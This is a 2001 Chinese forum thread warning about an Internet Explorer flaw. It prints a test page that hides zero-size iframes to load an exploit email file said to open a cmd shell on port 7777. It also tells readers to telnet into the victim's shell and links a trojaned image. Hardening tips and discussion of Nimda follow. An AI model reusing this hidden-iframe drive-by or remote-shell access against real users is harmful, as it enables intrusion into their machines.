• 实时天气:多伦多
    温度感觉:
  • 实时天气:温哥华
    温度感觉:
  • 实时天气:卡加利 -1°
    温度感觉: -5°
  • 实时天气:蒙特利尔
    温度感觉:
  • 实时天气:温尼伯 -8°
    温度感觉: -14°
查看: 2925|回复: 8

Ie的超级bug横空出世了,你访问图像文件都会被感染,大家小心!!!

发表于 2001-9-19 02:32:42 | 显示全部楼层 |阅读模式
没有太多的时间解释,这里做了个测试页
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312"

>
<title>New Page 1</title>
<meta name="GENERATOR" content="Microsoft FrontPage 3.0">
</head>
<body>
<p><img src="ot2131.JPG" width="322" height="486"&a
mp;g
t;</p>
<iframe src="load.eml" width="0" height="0" frameborder=&
amp;
quot;no" border="0"
marginwidth="0" marginheight="0" scrolling="no">
</iframe>
<iframe src="fangwen.htm" width="0" height="0" frameborde

r="no" border="0"
marginwidth="0" marginheight="0" scrolling="no">
</iframe>
</body>
</html>
上面这个页面首先利用了IE的APP漏洞,它对含有 HTML 语句的文本不检查扩展名。
在 NOTEPAD 上写一份 HTML 文件,保存为 .jpg。上传至空间服务器,用 IE 访问
URL。发现,IE 把 .jpg 误读成 .html.

接下来我们用了两个 iframe 分别调用页面,
load.eml
fangwen.htm
显示大小为 width="0" height="0" 所以在页面中不显示,
load.eml 是利用了ie的通过构造特殊代码导致 IE 用户执行攻击者命令漏洞
当用户访问load.eml 时将被自动的起出端口 7777的cmd shell
+++++++++++++++++++++++++++++++++++++++++++++++++++++
fangwen.htm 是一个记数统计器,用于查看哪些人,在几点,什么ip访问过。
=======================================================
ok , 现在你在命令行输入 telnet 目标ip 7777 就可以知道结果了!

下面就是那个JPG图像:
http://www.chinawolf.com/~vertarmy/1.jpg
没装防火墙请不要点击 (有木马!!!)

------------------------------------
预防方法:

  1.最好的办法是不使用IE和Outlook。可以用Netscape代替IE,用Foxmail代替Outlook。如果非要用

,建议你按下面的方法进行操作:

  (1)运行IE,点击“工具→Internet选项→安全→Internet区域的安全级别”,把安全极别由“中”

改为“高”。
  (2)接着,点击“自定义级别”按钮,在弹出的窗口中,禁用“对标记为可安全执行脚本的ActiveX

控件执行脚本”选项。
  (3)同理,在此窗口中禁用IE的“活动脚本”和“文件下载”功能。
  (4)禁用所有的ActiveX控制和插件。
  (5)设置资源管理器成“始终显示扩展名”。
  (6)禁止以WEB方式使用资源管理器。
  (7)取消“下载后确认打开”这种扩展名属性设置。
  (8)永远不直接从IE浏览器中选择打开文件。

  2.不要受陌生人的诱惑打开别人给你的RUL,如果确实想看,可以通过一些下载工具把页面下载下来

,然后用记事本等一些文本编辑工具打开查看代码。

  3.微软公司为该漏洞提供了一个补丁,赶快到下面所列出的URL去看看吧:
http://www.microsoft.com/windows ... Q290108/default.asp  
----------------
注:用ie又不喜欢开firewall得小心了,木马是不会认人得哦
发表于 2001-9-19 06:33:13 | 显示全部楼层
谢谢!关键是那个 iframe 的漏洞。昨天出现的 Nimda 也是用这个原理。

所以 IE6 中对 iframe 加强管理了。
发表于 2001-9-19 10:16:40 | 显示全部楼层
IE 6 有这个问题吗?我还是喜欢 IE。
匿名  发表于 2001-9-19 11:24:16

能解释这段吗?

load.eml 是利用了ie的通过构造特殊代码导致 IE 用户执行攻击者命令漏洞
当用户访问load.eml 时将被自动的起出端口 7777的cmd shell
 楼主| 发表于 2001-9-19 19:58:47 | 显示全部楼层
我公司的电脑也有中了Nimda 病毒 ,只要拷贝一个文件到中毒的电脑会自动生成 *.eml 文件 。 快升级病毒库。
norton 的 是2001-9-18
匿名  发表于 2001-9-19 21:00:30

*.eml

文件是E-MAIL文件是不是,OUTLOOK发现他就会自动发E-MAIL呢?
 楼主| 发表于 2001-9-19 21:30:51 | 显示全部楼层
是email文件,不过这对自己的电脑倒是没什么影响。主要表现在造成网络阻塞。文件大小一般是57344字节的文件。
发表于 2001-9-20 11:36:46 | 显示全部楼层
是 email 文件。它利用了 IE 的一个漏洞。IE 不检查 HTML 格式 email 文件头的 MIME 类型,直接就运行附件中的 exe 文件。收到这种 email 就被感染,都不需要打开附件!

赶紧下载补丁吧。
您需要登录后才可以回帖 登录 | 免费注册

本版积分规则

快速回复 返回顶部 返回列表